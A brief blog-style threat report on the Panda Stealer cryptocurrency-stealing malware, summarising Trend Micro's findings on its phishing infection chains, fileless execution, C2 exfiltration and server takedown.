by PandaStealer is a new information stealer that is targeting Cryptocurrency wallets for applications like Discord, Telegram, and Steam.
Trend Micro discovered this at the start of April and identified two infections chains being used. In their report:
“In one, an .XLSM attachment contains macros that download a loader. Then, the loader downloads and executes the main stealer… The other infection chain involves an attached .XLS file containing an Excel formula that utilizes a PowerShell command to access paste.ee, a Pastebin alternative, that accesses a second encrypted PowerShell command.”
Once installed Panda Stealer collects details like private keys and records of past transactions from various digital currency wallets like Bitcoin, Litecoin, and Ethereum.
Phishing campaigns have adopted this malware to lure victims into clicking on infected excel files. Panda can also take screenshots of the infected computer and steal data from web browsers.
Panda Stealer is very similar to the Collector Stealer (DC Stealer) malware that has been sold on the dark web. Some key differences include different C2 URLS, build tags, and execution folders.
“Besides cribbing from Collector Stealer, Panda Stealer has borrowed from another piece of malware: Namely, it uses the same fileless distribution method as the “Fair” variant of Phobos ransomware to slip past detection. In other words, it runs in memory after initial infection, instead of storing files on the hard drive.”
This is a very interesting part. Instead of relying on executables, these threats misuse tools that are already in the system to initiate attacks. This suggests that the threat lives in the memory of the machine, and tend to leave no traces behind. This bypasses traditional security software detection which looks for files written to machine’s disk and scans them and assesses maliciousness.
“Panda drops files in targeted systems’ Temp folders, storing stolen information under randomized file names. Then, it exfiltrates the stolen data and sends it to a C2 server.”
Its interesting to see how data exfiltration is often performed. Tools like PacketWhisperer are often used for stealthy exfiltration. The researchers were led to a login page 熊猫 which means Panda Stealer. There were 14 victims listed from the server logs. They also found a VPS that they were using to host the C2 rented from ShockHosting. Since reported, ShockHosting has suspended all operations on the server.
sources: https://www.zdnet.com/article/panda-stealer-dropped-in-discord-to-steal-user-cryptocurrency/
